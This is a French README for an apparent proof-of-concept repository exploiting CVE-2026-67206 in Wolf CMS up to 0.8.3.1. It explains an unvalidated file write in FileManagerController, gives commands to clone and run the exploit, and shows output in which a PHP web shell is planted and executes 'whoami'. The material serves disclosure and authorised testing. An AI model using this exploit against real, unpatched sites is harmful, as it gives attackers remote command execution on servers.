
Exploit PoC pour Wolf CMS <= 0.8.3.1 : s'authentifie auprès de l'Admin, écrit un fichier PHP arbitraire dans /public via FileManagerController et exécute des commandes via un web shell.
Ce dépôt contient un exploit de preuve de concept (PoC) pour CVE-2026-67206
Ce projet est fourni à des fins éducatives et uniquement pour des tests de sécurité autorisés. Ne l'utilisez pas contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas la permission de tester.
Une vulnérabilité d'écriture de fichier arbitraire existe dans les versions de Wolf CMS jusqu'à la 0.8.3.1. Elle permet à un attaquant authentifié d'écrire des fichiers arbitraires malveillants dans le répertoire /public de la racine web via les fonctions create_file() et save() de FileManagerController.php. La fonction create_file() de FileManagerController.php ne valide pas les extensions de fichier, ce qui permet à des attaquants authentifiés d'écrire des scripts PHP malveillants et d'obtenir des privilèges d'exécution de code à distance.
Toutes les versions de Wolf CMS jusqu'à la 0.8.3.1 sont concernées. Le dépôt Wolf CMS a été archivé le 28 août 2021 et n'est plus activement maintenu. Il n'existe actuellement aucun correctif pour cette vulnérabilité.
git clone https://github.com/anirbala98/CVE-2026-67206.git
cd CVE-2026-67206/
pip install -r requirements.txt
python exploit.py <base_url> -u <username> -p <password>
python exploit.py http://127.0.0.1:8080/ -u admin -p admin
└─$ python exploit.py http://127.0.0.1:8080/ -u admin -p 12966cc814K
[*] Logging in with provided credentials...
[+] Login successful
[*] Creating a file named shell.php...
[+] File creation successful
[*] Attempting to write payload to shell.php...
[+] Payload written successfully!
[+] Web shell can be accessed with 'cmd' query string at http://127.0.0.1:8080/public/shell.php
[+] Testing output of http://127.0.0.1:8080/public/shell.php?cmd=whoami
www-data